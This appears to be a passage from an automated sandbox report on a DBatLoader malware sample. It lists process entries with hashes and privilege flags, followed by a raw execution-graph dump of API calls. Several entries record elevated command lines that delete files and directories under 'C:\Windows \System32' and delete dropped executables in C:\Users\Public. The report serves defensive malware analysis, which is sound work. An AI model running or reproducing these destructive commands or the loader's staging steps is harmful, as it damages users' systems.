                            Wow64 process (32bit):true
                            Commandline:C:\Users\Public\Libraries\Ping_c.pif
                            Imagebase:0x400000
                            File size:1'443'840 bytes
                            MD5 hash:66561F313D11178EEE1955CE46E4CEA0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Yara matches:
                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000001F.00000002.2708904655.0000000002940000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 100%, Joe Sandbox ML
                            Has exited:false

                            Target ID:32
                            Start time:10:22:16
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:33
                            Start time:10:22:16
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:34
                            Start time:10:22:16
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:35
                            Start time:10:22:16
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:36
                            Start time:10:22:17
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:37
                            Start time:10:22:17
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:38
                            Start time:10:22:17
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:39
                            Start time:10:22:17
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true


                              Execution Graph

                              Execution Coverage:4%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:36.4%
                              Total number of Nodes:872
                              Total number of Limit Nodes:7
19125->19130 19126 7ff744f1c1c3 19127 7ff744f133f0 _vsnwprintf 19126->19127 19127->19125 19128 7ff744f0d208 _close 19128->19131 19129 7ff744f126e0 19 API calls 19129->19131 19132 7ff744f1c1f9 19130->19132 19131->19108 19131->19117 19131->19118 19131->19120 19131->19124 19131->19126 19131->19128 19131->19129 19133 7ff744f1c060 19131->19133 19135 7ff744f0b038 _dup2 19131->19135 19136 7ff744f1c246 19131->19136 19137 7ff744f1c1a5 19131->19137 19142 7ff744f0b356 19131->19142 19360 7ff744f2f318 _get_osfhandle GetFileType 19131->19360 19134 7ff744f0af98 2 API calls 19132->19134 19133->19136 19140 7ff744f109f4 2 API calls 19133->19140 19134->19108 19135->19131 19138 7ff744f0af98 2 API calls 19136->19138 19139 7ff744f0b038 _dup2 19137->19139 19141 7ff744f1c24b 19138->19141 19143 7ff744f1c1b7 19139->19143 19144 7ff744f1c084 19140->19144 19145 7ff744f2f1d8 166 API calls 19141->19145 19150 7ff744f0af98 2 API calls 19142->19150 19146 7ff744f1c207 19143->19146 19147 7ff744f1c1be 19143->19147 19148 7ff744f0b900 166 API calls 19144->19148 19145->19108 19149 7ff744f0d208 _close 19146->19149 19151 7ff744f0d208 _close 19147->19151 19152 7ff744f1c08c 19148->19152 19149->19142 19154 7ff744f1c211 19150->19154 19151->19126 19153 7ff744f1c094 wcsrchr 19152->19153 19165 7ff744f1c0ad 19152->19165 19153->19165 19155 7ff744f133f0 _vsnwprintf 19154->19155 19156 7ff744f1c22c 19155->19156 19157 7ff744f03278 166 API calls 19156->19157 19157->19108 19158 7ff744f1c106 19159 7ff744f0ff70 2 API calls 19158->19159 19161 7ff744f1c13b 19159->19161 19160 7ff744f1c0e0 _wcsnicmp 19160->19165 19161->19136 19162 7ff744f1c146 SearchPathW 19161->19162 19162->19136 19163 7ff744f1c188 19162->19163 19164 7ff744f126e0 19 API calls 19163->19164 19164->19137 19165->19158 19165->19160 19167 7ff744f11ea0 8 API calls 19166->19167 19168 7ff744f10ab9 19167->19168 19169 7ff744f10b12 memset 19168->19169 19170 7ff744f1d927 19168->19170 19171 7ff744f10aee _wcsnicmp 19168->19171 19173 7ff744f1128f ??_V@YAXPEAX 19168->19173 
19172 7ff744f0ca40 17 API calls 19169->19172 19175 7ff744f1081c 166 API calls 19170->19175 19171->19169 19171->19170 19174 7ff744f10b5a 19172->19174 19177 7ff744f0b364 17 API calls 19174->19177 19188 7ff744f1d94e 19174->19188 19176 7ff744f1d933 19175->19176 19176->19169 19176->19173 19178 7ff744f10b6f 19177->19178 19178->19173 19180 7ff744f10b8c wcschr 19178->19180 19184 7ff744f10c0f wcsrchr 19178->19184 19178->19188 19191 7ff744f0cd90 166 API calls 19178->19191 19192 7ff744f13060 171 API calls 19178->19192 19193 7ff744f1081c 166 API calls 19178->19193 19194 7ff744f0d3f0 223 API calls 19178->19194 19195 7ff744f11ea0 8 API calls 19178->19195 19196 7ff744f0af74 170 API calls 19178->19196 19197 7ff744f10d71 wcsrchr 19178->19197 19199 7ff744f1291c 8 API calls 19178->19199 19200 7ff744f10fb1 wcsrchr 19178->19200 19201 7ff744f10fd0 wcschr 19178->19201 19202 7ff744f12eb4 22 API calls 19178->19202 19205 7ff744f110fd wcsrchr 19178->19205 19214 7ff744f11087 _wcsicmp 19178->19214 19217 7ff744f1da74 19178->19217 19361 7ff744f13bac 19178->19361 19365 7ff744f12efc 19178->19365 19179 7ff744f1d96b ??_V@YAXPEAX 19179->19188 19180->19178 19183 7ff744f1d99a wcschr 19183->19188 19184->19178 19184->19188 19185 7ff744f1d9ca GetFileAttributesW 19186 7ff744f1da64 19185->19186 19185->19188 19187 7ff744f1da90 GetFileAttributesW 19187->19188 19189 7ff744f1daa8 GetLastError 19187->19189 19188->19179 19188->19183 19188->19185 19188->19186 19190 7ff744f1d9fd ??_V@YAXPEAX 19188->19190 19189->19186 19189->19188 19190->19188 19191->19178 19192->19178 19193->19178 19194->19178 19195->19178 19196->19178 19197->19178 19198 7ff744f10d97 NeedCurrentDirectoryForExePathW 19197->19198 19198->19178 19198->19188 19199->19178 19200->19178 19200->19201 19201->19186 19203 7ff744f10fed wcschr 19201->19203 19202->19178 19203->19178 19203->19186 19205->19178 19206 7ff744f1111a _wcsicmp 19205->19206 19207 7ff744f11138 _wcsicmp 19206->19207 19208 7ff744f1123d 19206->19208 19207->19208 19209 7ff744f110c5 
19207->19209 19210 7ff744f11175 19208->19210 19211 7ff744f11250 ??_V@YAXPEAX 19208->19211 19209->19210 19212 7ff744f11169 ??_V@YAXPEAX 19209->19212 19213 7ff744f18f80 7 API calls 19210->19213 19211->19210 19212->19210 19215 7ff744f0bf70 19213->19215 19216 7ff744f110a7 _wcsicmp 19214->19216 19214->19217 19215->18999 19215->19012 19216->19209 19216->19217 19217->19186 19217->19187 19219 7ff744f0cd90 166 API calls 19218->19219 19220 7ff744f15b12 19219->19220 19221 7ff744f0cb40 166 API calls 19220->19221 19246 7ff744f15b8b 19220->19246 19223 7ff744f15b26 19221->19223 19222 7ff744f18f80 7 API calls 19224 7ff744f0bf99 19222->19224 19225 7ff744f10a6c 273 API calls 19223->19225 19223->19246 19224->18998 19226 7ff744f15b43 19225->19226 19227 7ff744f15bb8 19226->19227 19228 7ff744f15b48 GetConsoleTitleW 19226->19228 19230 7ff744f15bbd GetConsoleTitleW 19227->19230 19231 7ff744f15bf4 19227->19231 19229 7ff744f0cad4 172 API calls 19228->19229 19232 7ff744f15b66 19229->19232 19235 7ff744f0cad4 172 API calls 19230->19235 19233 7ff744f15bfd 19231->19233 19234 7ff744f1f452 19231->19234 19379 7ff744f14224 InitializeProcThreadAttributeList 19232->19379 19240 7ff744f15c1b 19233->19240 19241 7ff744f1f462 19233->19241 19233->19246 19237 7ff744f13c24 166 API calls 19234->19237 19238 7ff744f15bdb 19235->19238 19237->19246 19440 7ff744f096e8 19238->19440 19243 7ff744f03278 166 API calls 19240->19243 19244 7ff744f03278 166 API calls 19241->19244 19243->19246 19244->19246 19246->19222 19249 7ff744f07211 _setjmp 19247->19249 19252 7ff744f07279 19247->19252 19250 7ff744f07265 19249->19250 19249->19252 19776 7ff744f072b0 19250->19776 19252->19003 19254 7ff744f0cb63 19253->19254 19255 7ff744f0cd90 166 API calls 19254->19255 19256 7ff744f0c848 19255->19256 19256->19053 19260 7ff744f0cad4 19256->19260 19272 7ff744f07d30 memset 19257->19272 19259 7ff744f07a8a 19259->19034 19261 7ff744f0cad9 19260->19261 19262 7ff744f0cb05 19260->19262 19261->19262 19263 7ff744f0cd90 166 API calls 19261->19263 
19262->19053 19264 7ff744f1c722 19263->19264 19264->19262 19265 7ff744f1c72e GetConsoleTitleW 19264->19265 19265->19262 19266 7ff744f1c74a 19265->19266 19267 7ff744f0b6b0 170 API calls 19266->19267 19271 7ff744f1c778 19267->19271 19268 7ff744f1c7ec 19269 7ff744f0ff70 2 API calls 19268->19269 19269->19262 19270 7ff744f1c7dd SetConsoleTitleW 19270->19268 19271->19268 19271->19270 19273 7ff744f0ca40 17 API calls 19272->19273 19274 7ff744f07dc3 19273->19274 19275 7ff744f1417c 166 API calls 19274->19275 19287 7ff744f1af72 19274->19287 19276 7ff744f07dee 19275->19276 19278 7ff744f0d3f0 223 API calls 19276->19278 19277 7ff744f03278 166 API calls 19279 7ff744f1af91 19277->19279 19280 7ff744f07dfb 19278->19280 19279->19259 19281 7ff744f1af7e 19280->19281 19282 7ff744f07e09 19280->19282 19283 7ff744f1af89 19281->19283 19281->19287 19282->19279 19285 7ff744f11ea0 8 API calls 19282->19285 19286 7ff744f0b900 166 API calls 19282->19286 19282->19287 19291 7ff744f07ea4 19282->19291 19295 7ff744f1b024 19282->19295 19305 7ff744f07ef1 19282->19305 19308 7ff744f07aa0 19282->19308 19284 7ff744f11ea0 8 API calls 19283->19284 19284->19279 19285->19282 19286->19282 19287->19277 19288 7ff744f1823c 10 API calls 19288->19305 19289 7ff744f1afae 19292 7ff744f1b03f 19289->19292 19300 7ff744f1afce 19289->19300 19290 7ff744f08b20 231 API calls 19290->19305 19293 7ff744f07ec3 19291->19293 19294 7ff744f07eb7 ??_V@YAXPEAX 19291->19294 19292->19287 19297 7ff744f18f80 7 API calls 19293->19297 19294->19293 19298 7ff744f03278 166 API calls 19295->19298 19296 7ff744f0b364 17 API calls 19296->19305 19299 7ff744f07ed5 19297->19299 19298->19279 19299->19259 19300->19279 19301 7ff744f1aff6 19300->19301 19302 7ff744f03278 166 API calls 19300->19302 19301->19279 19302->19301 19303 7ff744f08940 17 API calls 19303->19305 19304 7ff744f18a70 2 API calls 19304->19305 19305->19279 19305->19282 19305->19288 19305->19289 19305->19290 19305->19292 19305->19296 19305->19303 19305->19304 19306 7ff744f13a0c 2 API calls 
19305->19306 19306->19305 19309 7ff744f07aeb memset 19308->19309 19310 7ff744f07adb 19308->19310 19312 7ff744f0ca40 17 API calls 19309->19312 19343 7ff744f1291c GetDriveTypeW 19310->19343 19314 7ff744f07b36 19312->19314 19316 7ff744f07b3e GetFullPathNameW 19314->19316 19332 7ff744f1ae4e 19314->19332 19315 7ff744f1ae3a 19317 7ff744f03278 166 API calls 19315->19317 19318 7ff744f07b73 19316->19318 19319 7ff744f1ae55 GetLastError 19316->19319 19320 7ff744f1ae44 19317->19320 19321 7ff744f1ae68 19318->19321 19322 7ff744f07b7e CreateDirectoryW 19318->19322 19319->19332 19324 7ff744f07bb5 19320->19324 19329 7ff744f03278 166 API calls 19321->19329 19325 7ff744f07b93 19322->19325 19326 7ff744f07bdf GetLastError 19322->19326 19323 7ff744f03278 166 API calls 19328 7ff744f1af6b 19323->19328 19327 7ff744f18f80 7 API calls 19324->19327 19325->19324 19330 7ff744f07ba9 free 19325->19330 19326->19321 19333 7ff744f07bf8 19326->19333 19331 7ff744f07bc6 19327->19331 19341 7ff744f1ae7e 19329->19341 19330->19324 19331->19282 19332->19323 19333->19332 19334 7ff744f07cd1 CreateDirectoryW 19333->19334 19337 7ff744f07c8f 19333->19337 19338 7ff744f07c52 CreateDirectoryW 19333->19338 19340 7ff744f07cca 19333->19340 19333->19341 19334->19325 19335 7ff744f07cf3 19334->19335 19336 7ff744f1af46 GetLastError 19335->19336 19336->19325 19336->19332 19337->19333 19337->19338 19338->19337 19339 7ff744f07c7b GetLastError 19338->19339 19339->19332 19339->19337 19340->19334 19341->19332 19341->19334 19342 7ff744f1af3d 19341->19342 19342->19336 19344 7ff744f18f80 7 API calls 19343->19344 19345 7ff744f07ae3 19344->19345 19345->19309 19345->19315 19347 7ff744f0c4c9 19346->19347 19348 7ff744f0c486 19346->19348 19351 7ff744f0ff70 2 API calls 19347->19351 19353 7ff744f0c161 19347->19353 19349 7ff744f0c48e wcschr 19348->19349 19348->19353 19350 7ff744f0c4ef 19349->19350 19349->19353 19352 7ff744f0cd90 166 API calls 19350->19352 19351->19353 19359 7ff744f0c4f9 19352->19359 19353->19069 19353->19095 19354 
7ff744f0c5bd 19355 7ff744f0c541 19354->19355 19358 7ff744f0b6b0 170 API calls 19354->19358 19355->19353 19357 7ff744f0ff70 2 API calls 19355->19357 19356 7ff744f0d840 178 API calls 19356->19359 19357->19353 19358->19355 19359->19353 19359->19354 19359->19355 19359->19356 19360->19131 19362 7ff744f13bfe 19361->19362 19364 7ff744f13bcf 19361->19364 19362->19178 19363 7ff744f13bdc wcschr 19363->19362 19363->19364 19364->19362 19364->19363 19366 7ff744f12f97 19365->19366 19367 7ff744f12f2a 19365->19367 19366->19367 19368 7ff744f12f9c wcschr 19366->19368 19369 7ff744f1823c 10 API calls 19367->19369 19371 7ff744f12f5a 19368->19371 19372 7ff744f12fb6 wcschr 19368->19372 19370 7ff744f12f56 19369->19370 19370->19371 19373 7ff744f13a0c 2 API calls 19370->19373 19374 7ff744f18f80 7 API calls 19371->19374 19378 7ff744f1e4ec 19371->19378 19372->19367 19372->19371 19375 7ff744f12fe0 19373->19375 19376 7ff744f12f83 19374->19376 19375->19371 19377 7ff744f12fe9 wcsrchr 19375->19377 19376->19178 19377->19371 19380 7ff744f142ab UpdateProcThreadAttribute 19379->19380 19381 7ff744f1ecd4 GetLastError 19379->19381 19383 7ff744f142eb memset memset GetStartupInfoW 19380->19383 19384 7ff744f1ecf0 GetLastError 19380->19384 19382 7ff744f1ecee 19381->19382 19386 7ff744f13a90 170 API calls 19383->19386 19477 7ff744f29eec 19384->19477 19387 7ff744f143a8 19386->19387 19389 7ff744f0b900 166 API calls 19387->19389 19390 7ff744f143bb 19389->19390 19391 7ff744f14638 _local_unwind 19390->19391 19392 7ff744f143cc 19390->19392 19391->19392 19393 7ff744f143de wcsrchr 19392->19393 19394 7ff744f14415 19392->19394 19393->19394 19395 7ff744f143f7 lstrcmpW 19393->19395 19464 7ff744f15a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 19394->19464 19395->19394 19397 7ff744f14668 19395->19397 19465 7ff744f29044 19397->19465 19436 7ff744f15c3c 19437 7ff744f15c4e 19436->19437 19438 7ff744f15c45 19436->19438 19437->19246 19438->19437 19439 7ff744f1f470 SetConsoleTitleW 19438->19439 19439->19437 19457 
7ff744f09737 19440->19457 19442 7ff744f0977d memset 19444 7ff744f0ca40 17 API calls 19442->19444 19443 7ff744f0cd90 166 API calls 19443->19457 19444->19457 19445 7ff744f1b76e 19447 7ff744f03278 166 API calls 19445->19447 19446 7ff744f1b7b3 19450 7ff744f1b787 19447->19450 19448 7ff744f1b79a 19449 7ff744f1855c ??_V@YAXPEAX 19448->19449 19449->19446 19452 7ff744f1b795 19450->19452 19567 7ff744f2e944 19450->19567 19451 7ff744f0b364 17 API calls 19451->19457 19575 7ff744f27694 19452->19575 19457->19442 19457->19443 19457->19445 19457->19446 19457->19448 19457->19451 19459 7ff744f0986d 19457->19459 19479 7ff744f11fac memset 19457->19479 19506 7ff744f0ce10 19457->19506 19556 7ff744f096b4 19457->19556 19561 7ff744f15920 19457->19561 19460 7ff744f0988c 19459->19460 19461 7ff744f09880 ??_V@YAXPEAX 19459->19461 19462 7ff744f18f80 7 API calls 19460->19462 19461->19460 19463 7ff744f0989d 19462->19463 19463->19436 19466 7ff744f13a90 170 API calls 19465->19466 19467 7ff744f29064 19466->19467 19468 7ff744f2906e 19467->19468 19471 7ff744f29083 19467->19471 19469 7ff744f1498c 8 API calls 19468->19469 19470 7ff744f29081 19469->19470 19470->19394 19472 7ff744f0cd90 166 API calls 19471->19472 19473 7ff744f2909b 19472->19473 19473->19470 19474 7ff744f1498c 8 API calls 19473->19474 19475 7ff744f290ec 19474->19475 19476 7ff744f0ff70 2 API calls 19475->19476 19476->19470 19478 7ff744f1ed0a DeleteProcThreadAttributeList 19477->19478 19478->19382 19480 7ff744f1203b 19479->19480 19481 7ff744f120b0 19480->19481 19482 7ff744f12094 19480->19482 19483 7ff744f13060 171 API calls 19481->19483 19485 7ff744f1211c 19481->19485 19484 7ff744f120a6 19482->19484 19486 7ff744f03278 166 API calls 19482->19486 19483->19485 19488 7ff744f18f80 7 API calls 19484->19488 19485->19484 19487 7ff744f12e44 2 API calls 19485->19487 19486->19484 19490 7ff744f12148 19487->19490 19489 7ff744f12325 19488->19489 19489->19457 19490->19484 19581 7ff744f12d70 19490->19581 19493 7ff744f0b900 166 API calls 19495 7ff744f121d0 
19493->19495 19494 7ff744f1e04a ??_V@YAXPEAX 19494->19484 19495->19494 19496 7ff744f1221c wcsspn 19495->19496 19505 7ff744f122a4 ??_V@YAXPEAX 19495->19505 19498 7ff744f0b900 166 API calls 19496->19498 19499 7ff744f1223b 19498->19499 19499->19494 19503 7ff744f12252 19499->19503 19500 7ff744f1228f 19501 7ff744f0d3f0 223 API calls 19500->19501 19501->19505 19502 7ff744f1e06d wcschr 19502->19503 19503->19500 19503->19502 19504 7ff744f1e090 towupper 19503->19504 19504->19500 19504->19503 19505->19484 19507 7ff744f0d0f8 19506->19507 19537 7ff744f0ce5b 19506->19537 19509 7ff744f18f80 7 API calls 19507->19509 19508 7ff744f1c860 19510 7ff744f1c97c 19508->19510 19624 7ff744f2ee88 19508->19624 19511 7ff744f0d10a 19509->19511 19514 7ff744f2e9b4 197 API calls 19510->19514 19511->19457 19516 7ff744f1c981 longjmp 19514->19516 19519 7ff744f1c99a 19516->19519 19517 7ff744f1c95c 19517->19510 19522 7ff744f096b4 186 API calls 19517->19522 19518 7ff744f1c882 EnterCriticalSection LeaveCriticalSection 19524 7ff744f0d0e3 19518->19524 19519->19507 19521 7ff744f1c9b3 ??_V@YAXPEAX 19519->19521 19521->19507 19522->19517 19524->19457 19525 7ff744f0cd90 166 API calls 19525->19537 19526 7ff744f0d208 _close 19526->19537 19527 7ff744f1c9d5 19528 7ff744f2d610 167 API calls 19527->19528 19530 7ff744f1c9da 19528->19530 19529 7ff744f0b900 166 API calls 19529->19537 19531 7ff744f1ca07 19530->19531 19533 7ff744f2bfec 176 API calls 19530->19533 19532 7ff744f2e91c 198 API calls 19531->19532 19538 7ff744f1ca0c 19532->19538 19534 7ff744f1c9f1 19533->19534 19536 7ff744f03240 166 API calls 19534->19536 19535 7ff744f0cf33 memset 19535->19537 19536->19531 19537->19507 19537->19508 19537->19519 19537->19524 19537->19525 19537->19527 19537->19529 19537->19535 19539 7ff744f0ca40 17 API calls 19537->19539 19540 7ff744f2bfec 176 API calls 19537->19540 19541 7ff744f0d184 wcschr 19537->19541 19542 7ff744f1c9c9 19537->19542 19543 7ff744f0d1a7 wcschr 19537->19543 19546 7ff744f10a6c 273 API calls 19537->19546 19547 
7ff744f0be00 647 API calls 19537->19547 19548 7ff744f13448 166 API calls 19537->19548 19549 7ff744f10580 12 API calls 19537->19549 19550 7ff744f0cfab _wcsicmp 19537->19550 19553 7ff744f11fac 238 API calls 19537->19553 19555 7ff744f0d044 ??_V@YAXPEAX 19537->19555 19591 7ff744f10494 19537->19591 19604 7ff744f0df60 19537->19604 19660 7ff744f2778c 19537->19660 19691 7ff744f2c738 19537->19691 19538->19457 19539->19537 19540->19537 19541->19537 19544 7ff744f1855c ??_V@YAXPEAX 19542->19544 19543->19537 19544->19507 19546->19537 19547->19537 19548->19537 19551 7ff744f0d003 GetConsoleOutputCP GetCPInfo 19549->19551 19550->19537 19552 7ff744f104f4 3 API calls 19551->19552 19552->19537 19553->19537 19555->19537 19557 7ff744f096c8 19556->19557 19558 7ff744f1b6e2 RevertToSelf CloseHandle 19556->19558 19559 7ff744f096ce 19557->19559 19560 7ff744f06a48 184 API calls 19557->19560 19559->19457 19560->19557 19562 7ff744f1596c 19561->19562 19566 7ff744f15a12 19561->19566 19563 7ff744f1598d VirtualQuery 19562->19563 19562->19566 19564 7ff744f159ad 19563->19564 19563->19566 19565 7ff744f159b7 VirtualQuery 19564->19565 19564->19566 19565->19564 19565->19566 19566->19457 19568 7ff744f2e990 19567->19568 19569 7ff744f2e954 19567->19569 19570 7ff744f2e9b4 197 API calls 19568->19570 19571 7ff744f2ee88 390 API calls 19569->19571 19572 7ff744f2e995 longjmp 19570->19572 19573 7ff744f2e964 19571->19573 19573->19568 19574 7ff744f096b4 186 API calls 19573->19574 19574->19573 19576 7ff744f276a3 19575->19576 19577 7ff744f276b7 19576->19577 19578 7ff744f096b4 186 API calls 19576->19578 19579 7ff744f2e9b4 197 API calls 19577->19579 19578->19576 19580 7ff744f276bc longjmp 19579->19580 19582 7ff744f12d89 19581->19582 19583 7ff744f12da3 19581->19583 19586 7ff744f121af 19582->19586 19587 7ff744f12e0c 19582->19587 19583->19582 19585 7ff744f12dbc GetProcessHeap RtlFreeHeap 19583->19585 19585->19582 19585->19583 19586->19493 19588 7ff744f12e32 19587->19588 19589 7ff744f12e11 19587->19589 19588->19582 
19589->19588 19590 7ff744f1e494 VirtualFree 19589->19590 19593 7ff744f104a4 19591->19593 19592 7ff744f126e0 19 API calls 19592->19593 19593->19592 19594 7ff744f104b9 _get_osfhandle SetFilePointer 19593->19594 19595 7ff744f1d845 19593->19595 19597 7ff744f1d839 19593->19597 19600 7ff744f03278 166 API calls 19593->19600 19594->19537 19596 7ff744f2f1d8 166 API calls 19595->19596 19599 7ff744f1d837 19596->19599 19598 7ff744f03278 166 API calls 19597->19598 19598->19599 19601 7ff744f1d819 _getch 19600->19601 19601->19593 19602 7ff744f1d832 19601->19602 19701 7ff744f2bde4 EnterCriticalSection LeaveCriticalSection 19602->19701 19605 7ff744f0dfe2 19604->19605 19606 7ff744f0df93 19604->19606 19608 7ff744f0e100 VirtualFree 19605->19608 19609 7ff744f0e00b _setjmp 19605->19609 19606->19605 19607 7ff744f0df9f GetProcessHeap RtlFreeHeap 19606->19607 19607->19605 19607->19606 19608->19605 19610 7ff744f0e04a 19609->19610 19611 7ff744f0ceaa _tell 19609->19611 19612 7ff744f0e600 473 API calls 19610->19612 19611->19526 19613 7ff744f0e073 19612->19613 19614 7ff744f0e0e0 longjmp 19613->19614 19615 7ff744f0e081 19613->19615 19623 7ff744f0e0b0 19614->19623 19616 7ff744f0d250 475 API calls 19615->19616 19618 7ff744f0e086 19616->19618 19620 7ff744f0e600 473 API calls 19618->19620 19618->19623 19621 7ff744f0e0a7 19620->19621 19622 7ff744f2d610 167 API calls 19621->19622 19621->19623 19622->19623 19623->19611 19702 7ff744f2d3fc 19623->19702 19625 7ff744f2eefd 19624->19625 19626 7ff744f2eed1 19624->19626 19764 7ff744f1885c FormatMessageW 19625->19764 19750 7ff744f07420 19626->19750 19630 7ff744f101b8 6 API calls 19631 7ff744f2eee5 19630->19631 19634 7ff744f2eef8 19631->19634 19635 7ff744f2eeeb 19631->19635 19632 7ff744f2ef41 LocalFree GetStdHandle GetConsoleMode 19640 7ff744f2efe8 GetStdHandle GetConsoleMode 19632->19640 19641 7ff744f2efcf SetConsoleMode 19632->19641 19633 7ff744f2ef04 19633->19632 19639 7ff744f2ef2f _wcsupr 19633->19639 19636 7ff744f0d208 _close 19634->19636 19637 
7ff744f0d208 _close 19635->19637 19636->19625 19656 7ff744f2eef0 19637->19656 19639->19632 19642 7ff744f2f015 SetConsoleMode 19640->19642 19646 7ff744f2f03c 19640->19646 19641->19640 19642->19646 19643 7ff744f18f80 7 API calls 19644 7ff744f1c879 19643->19644 19644->19517 19644->19518 19645 7ff744f03240 166 API calls 19645->19646 19646->19645 19647 7ff744f101b8 6 API calls 19646->19647 19648 7ff744f2f07e GetStdHandle FlushConsoleInputBuffer 19646->19648 19649 7ff744f2f0a0 GetStdHandle 19646->19649 19650 7ff744f2f12d wcschr 19646->19650 19652 7ff744f2f161 19646->19652 19653 7ff744f13448 166 API calls 19646->19653 19658 7ff744f2f0d7 towupper 19646->19658 19659 7ff744f13448 166 API calls 19646->19659 19647->19646 19648->19646 19651 7ff744f28450 367 API calls 19649->19651 19650->19646 19651->19646 19654 7ff744f2f17a 19652->19654 19655 7ff744f2f166 SetConsoleMode 19652->19655 19653->19650 19654->19656 19657 7ff744f2f17f SetConsoleMode 19654->19657 19655->19654 19656->19643 19657->19656 19658->19646 19659->19646 19668 7ff744f277bc 19660->19668 19661 7ff744f27aca 19664 7ff744f134a0 166 API calls 19661->19664 19662 7ff744f279c0 19670 7ff744f134a0 166 API calls 19662->19670 19666 7ff744f27adb 19664->19666 19665 7ff744f27ab5 19669 7ff744f13448 166 API calls 19665->19669 19672 7ff744f27af0 19666->19672 19675 7ff744f13448 166 API calls 19666->19675 19667 7ff744f27984 19667->19662 19673 7ff744f27989 19667->19673 19668->19661 19668->19662 19668->19665 19668->19667 19671 7ff744f27a00 19668->19671 19668->19673 19681 7ff744f13448 166 API calls 19668->19681 19682 7ff744f2778c 166 API calls 19668->19682 19684 7ff744f279ef 19668->19684 19669->19684 19674 7ff744f279d6 19670->19674 19677 7ff744f27a0b 19671->19677 19671->19684 19689 7ff744f27a33 19671->19689 19676 7ff744f2778c 166 API calls 19672->19676 19673->19684 19769 7ff744f276e0 19673->19769 19678 7ff744f13448 166 API calls 19674->19678 19690 7ff744f279e7 19674->19690 19675->19672 19680 7ff744f27afb 19676->19680 19677->19684 19685 
7ff744f134a0 166 API calls 19677->19685 19678->19690 19680->19673 19686 7ff744f13448 166 API calls 19680->19686 19681->19668 19682->19668 19683 7ff744f13448 166 API calls 19683->19684 19684->19537 19687 7ff744f27a23 19685->19687 19686->19673 19688 7ff744f2778c 166 API calls 19687->19688 19688->19690 19689->19683 19765 7ff744f27730 19690->19765 19692 7ff744f2c775 19691->19692 19696 7ff744f2c7ab 19691->19696 19693 7ff744f0cd90 166 API calls 19692->19693 19695 7ff744f2c781 19693->19695 19694 7ff744f2c8d4 19694->19537 19695->19694 19697 7ff744f0b0d8 194 API calls 19695->19697 19696->19694 19696->19695 19698 7ff744f0b6b0 170 API calls 19696->19698 19699 7ff744f0b038 _dup2 19696->19699 19700 7ff744f0d208 _close 19696->19700 19697->19694 19698->19696 19699->19696 19700->19696 19709 7ff744f2d419 19702->19709 19703 7ff744f2d555 19727 7ff744f2d31c 19703->19727 19704 7ff744f2d592 19705 7ff744f13448 166 API calls 19704->19705 19708 7ff744f2d5a5 19705->19708 19706 7ff744f2d5c4 19710 7ff744f13448 166 API calls 19706->19710 19711 7ff744f2d5ba 19708->19711 19716 7ff744f13448 166 API calls 19708->19716 19709->19703 19709->19704 19709->19706 19712 